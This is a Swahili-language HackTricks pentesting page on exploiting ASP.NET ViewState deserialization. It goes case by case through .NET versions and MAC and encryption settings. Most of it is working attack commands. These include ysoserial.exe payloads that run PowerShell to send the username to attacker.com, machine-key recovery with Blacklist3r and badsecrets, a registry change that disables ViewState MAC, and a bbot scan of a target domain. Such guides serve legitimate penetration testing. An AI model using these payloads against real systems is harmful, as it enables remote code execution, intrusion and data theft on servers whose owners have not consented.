hacktricks/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

# Kudukua \_\_VIEWSTATE bila kujua siri

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">

Ikiwa una nia ya **kazi ya kudukua** na kudukua yasiyodukuliwa - **tunatafuta wafanyakazi!** (_inahitajika uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha_).

{% embed url="https://www.stmcyber.com/careers" %}

## Ni nini ViewState

**ViewState** hutumika kama mfumo wa msingi katika ASP.NET kuweka data ya ukurasa na udhibiti kwenye kurasa za wavuti. Wakati wa kurendera HTML ya ukurasa, hali ya sasa ya ukurasa na thamani za kuhifadhiwa wakati wa postback zinafanywa kuwa vitambulisho vilivyosimbwa kwa kutumia base64. Vitambulisho hivi kisha huingizwa kwenye uga wa ViewState uliofichwa.

Maelezo ya ViewState yanaweza kucharacterize kwa mali zifuatazo au mchanganyiko wao:

- **Base64**:
- Muundo huu hutumiwa wakati sifa za `EnableViewStateMac` na `ViewStateEncryptionMode` zote zimefungwa.

- **Base64 + MAC (Message Authentication Code) Imewezeshwa**:
- Kuwezesha MAC kunafanywa kwa kuweka sifa ya `EnableViewStateMac` kuwa kweli. Hii hutoa uthibitisho wa ukweli kwa data ya ViewState.

- **Base64 + Imesimbwa**:
- Ufichaji unatumika wakati sifa ya `ViewStateEncryptionMode` imefungwa, ikidumisha usiri wa data ya ViewState.

## Majaribio ya Kesi

Picha ni jedwali linaloelezea mipangilio tofauti ya ViewState katika ASP.NET kulingana na toleo la mfumo wa .NET. Hapa kuna muhtasari wa yaliyomo:

1. Kwa **toleo lolote la .NET**, wakati MAC na Ufichaji wote wamelemazwa, MachineKey haihitajiki, na kwa hivyo hakuna njia inayofaa ya kuigundua.

2. Kwa **toleo chini ya 4.5**, ikiwa MAC imelemazwa lakini Ufichaji haujafanywa, MachineKey inahitajika. Njia ya kuigundua MachineKey inaitwa "Blacklist3r."

3. Kwa **toleo chini ya 4.5**, bila kujali ikiwa MAC imelemazwa au haijalemazwa, ikiwa Ufichaji umewezeshwa, MachineKey inahitajika. Kuigundua MachineKey ni kazi ya "Blacklist3r - Maendeleo ya Baadaye."

4. Kwa **toleo 4.5 na zaidi**, mchanganyiko wowote wa MAC na Ufichaji (iwe wote ni kweli, au moja ni kweli na nyingine ni uwongo) unahitaji MachineKey. MachineKey inaweza kugunduliwa kwa kutumia "Blacklist3r."


### Jaribio la Kesi: 1 – EnableViewStateMac=false na viewStateEncryptionMode=false

Pia inawezekana kulemaza kabisa ViewStateMAC kwa kuweka ufunguo wa usajili wa `AspNetEnforceViewStateMac` kuwa sifuri katika:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}
```
**Kutambua Atributi za ViewState**

Unaweza kujaribu kutambua ikiwa ViewState inalindwa na MAC kwa kukamata ombi lenye parameter hii na BurpSuite. Ikiwa Mac haikutumika kulinda parameter hiyo, unaweza kuitumia kwa kudukua kwa kutumia [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
```
ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"
```
### Kesi ya majaribio 1.5 - Kama Kesi ya majaribio 1 lakini kuki ya ViewState haikutumwa na seva

Watumiaji wanaweza **kuondoa ViewState** isiwe sehemu ya Ombi la HTTP (mtumiaji hataipokea kuki hii).\
Inaweza kudhaniwa kuwa ikiwa **ViewState** haipo, utekelezaji wao ni **salama** kutokana na hatari yoyote inayoweza kutokea na deserialization ya ViewState.\
Hata hivyo, hiyo sio kesi. Ikiwa tunaweka **parameta ya ViewState** kwenye mwili wa ombi na kutuma mzigo uliosanidiwa wetu kwa kutumia ysoserial, bado tutaweza kufikia **utekelezaji wa nambari** kama ilivyoonyeshwa katika **Kesi ya 1**.


### Kesi ya Majaribio: 2 - .Net < 4.5 na EnableViewStateMac=true & ViewStateEncryptionMode=false

Ili **kuwezesha ViewState MAC** kwa **ukurasa maalum**, tunahitaji kufanya mabadiliko yafuatayo kwenye faili ya aspx maalum:
```bash
<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>
```
Tunaweza pia kufanya hivyo kwa **jumla** ya programu kwa kuweka katika faili ya **web.config** kama inavyoonyeshwa hapa chini:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>
```
Kwa kuwa parameter hulindwa na MAC, ili kutekeleza shambulio kwa mafanikio, kwanza tunahitaji kupata ufunguo uliotumiwa.

Unaweza kujaribu kutumia [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) ili kupata ufunguo uliotumiwa.
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value
```
[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) ni chombo kingine kinachoweza kutambua machineKeys maarufu. Imeandikwa kwa kutumia Python, kwa hivyo tofauti na Blacklist3r, hakuna tegemezi la Windows. Kwa viewstates za .NET, kuna kifaa cha "python blacklist3r", ambacho ni njia ya haraka zaidi ya kutumia.

Inaweza kupewa viewstate na jenereta moja kwa moja:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
```
![https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png](https://user-images.githubusercontent.com/24899338/227034640-662b6aad-f8b9-49e4-9a6b-62a5f6ae2d60.png)

Au, inaweza kuunganisha moja kwa moja kwenye URL ya lengo na kujaribu kukata viewstate kutoka kwenye HTML:
```
pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx
```
![https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png](https://user-images.githubusercontent.com/24899338/227034654-e8ad9648-6c0e-47cb-a873-bf97623a0089.png)

Kutafuta viewstates zenye udhaifu kwa kiwango kikubwa, kwa kushirikiana na uchunguzi wa subdomain, moduli ya `badsecrets` [**BBOT**](exploiting-\_\_viewstate-parameter.md) inaweza kutumika:
```
bbot -f subdomain-enum -m badsecrets -t evil.corp
```
![https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png](https://user-images.githubusercontent.com/24899338/227028780-950d067a-4a01-481f-8e11-41fabed1943a.png)

Ikiwa una bahati na ufunguo unapatikana, unaweza kuendelea na shambulio kwa kutumia [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)**:**
```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}
```
Katika hali ambapo parameter `_VIEWSTATEGENERATOR` **hautumwi** na seva, **hakuhitaji** kutoa parameter `--generator` **lakini hizi zinahitajika**:
```bash
--apppath="/" --path="/hello.aspx"
```
### Kesi ya Jaribio: 3 - .Net < 4.5 na EnableViewStateMac=true/false na ViewStateEncryptionMode=true

Katika kesi hii, haijulikani ikiwa parameter inalindwa na MAC. Kwa hivyo, thamani labda imefichwa na utahitaji **Machine Key kuweza kuficha mzigo wako** ili kutumia udhaifu huo.

**Katika kesi hii** [**Blacklist3r**](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper) **moduli inaendelezwa...**

**Kabla ya .NET 4.5**, ASP.NET inaweza **kukubali** parameter ya \_`__VIEWSTATE`\_ isiyofichwa kutoka kwa watumiaji **hata** ikiwa **`ViewStateEncryptionMode`** imekuwa imewekwa kuwa _**Always**_. ASP.NET **inachunguza tu** uwepo wa parameter ya **`__VIEWSTATEENCRYPTED`** katika ombi. **Ikiwa mtu anatoa parameter hii, na kutuma mzigo usiofichwa, bado utasindika.**

Kwa hivyo, ikiwa wadukuzi wanapata njia ya kupata Machinekey kupitia udhaifu mwingine kama utafutaji wa faili, [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net) amri iliyotumiwa katika **Kesi ya 2**, inaweza kutumika kutekeleza RCE kwa kutumia udhaifu wa deserialization ya ViewState.

* Ondoa parameter ya `__VIEWSTATEENCRYPTED` kutoka kwa ombi ili kutumia udhaifu wa deserialization ya ViewState, vinginevyo itarudisha kosa la uthibitisho wa MAC ya Viewstate na jaribio litashindwa.

### Kesi ya Jaribio: 4 - .Net >= 4.5 na EnableViewStateMac=true/false na ViewStateEncryptionMode=true/false isipokuwa sifa zote mbili kuwa false

Tunaweza kulazimisha matumizi ya mfumo wa ASP.NET kwa kutoa parameter ifuatayo ndani ya faili ya web.config kama inavyoonyeshwa hapa chini.
```xml
<httpRuntime targetFramework="4.5" />
```
Badala yake, hii inaweza kufanywa kwa kubainisha chaguo lifuatalo ndani ya kipengele cha `machineKey` cha faili ya web.config.
```bash
compatibilityMode="Framework45"
```
Kama ilivyokuwa hapo awali, **thamani imefichwa.** Kwa hivyo, ili kutuma **malipo halali, mshambuliaji anahitaji ufunguo**.

Unaweza jaribu kutumia [**Blacklist3r(AspDotNetWrapper.exe)** ](https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper)kupata ufunguo unaotumiwa:
```
AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}
```
Kwa maelezo zaidi kuhusu IISDirPath na TargetPagePath [rejea hapa](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)

Au, na [**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets) (na thamani ya jenereta):
```bash
cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415
```
![https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png](https://user-images.githubusercontent.com/24899338/227043316-13f0488f-5326-46cc-9604-404b908ebd7b.png)

Baada ya kutambua ufunguo sahihi wa Mashine, **hatua inayofuata ni kuzalisha mzigo uliosanidiwa kwa kutumia** [**YSoSerial.Net**](https://github.com/pwntester/ysoserial.net)
```
ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"
```
Ikiwa una thamani ya `__VIEWSTATEGENERATOR` unaweza kujaribu **kutumia** parameter ya `--generator` na thamani hiyo na **kutoa** parameta za `--path` na `--apppath`

![](https://notsosecure.com/sites/all/assets/group/nss\_uploads/2019/06/4.2.png)

Udanganyifu mafanikio wa udhaifu wa deserialization ya ViewState utasababisha ombi la nje ya wigo kwa seva inayodhibitiwa na mshambuliaji, ambayo inajumuisha jina la mtumiaji. Aina hii ya udanganyifu inadhihirishwa katika ushahidi wa dhana (PoC) ambao unaweza kupatikana kupitia rasilimali iliyoitwa "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". Kwa maelezo zaidi juu ya jinsi mchakato wa udanganyifu unavyofanya kazi na jinsi ya kutumia zana kama Blacklist3r kwa kutambua MachineKey, unaweza kupitia [PoC ya Udanganyifu Mafanikio](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/#PoC).

### Kesi ya Jaribio 6 - ViewStateUserKeys inatumika

Mali ya **ViewStateUserKey** inaweza kutumika kwa **ulinzi** dhidi ya **shambulio la CSRF**. Ikiwa ufunguo kama huo umedefinika katika programu na tunajaribu kuzalisha mzigo wa **ViewState** na njia zilizojadiliwa hadi sasa, **mzigo hautasindika na programu**.\
Unahitaji kutumia parameter moja zaidi ili kuunda mzigo kwa usahihi:
```bash
--viewstateuserkey="randomstringdefinedintheserver"
```
### Matokeo ya Ufanisi wa Udukuzi <a href="#poc" id="poc"></a>

Kwa majaribio yote, ikiwa mzigo wa ViewState wa YSoSerial.Net unafanya kazi **kwa mafanikio**, basi seva itajibu na "**Hitilafu ya seva ya ndani 500**" na maudhui ya jibu "**Taarifa ya hali ni batili kwa ukurasa huu na inaweza kuwa imeharibika**" na tunapata ombi la OOB.

Angalia [taarifa zaidi hapa]([**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/))

## Marejeo

* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)
* [**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817)\\
* [**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)
* [**https://blog.blacklanternsecurity.com/p/introducing-badsecrets**](https://blog.blacklanternsecurity.com/p/introducing-badsecrets)

<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">

Ikiwa una nia ya **kazi ya udukuzi** na kudukua yasiyoweza kudukuliwa - **tunatoa ajira!** (_inahitajika kuwa na uwezo wa kuandika na kuzungumza Kipolishi kwa ufasaha_).

{% embed url="https://www.stmcyber.com/careers" %}

<details>

<summary><strong>Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>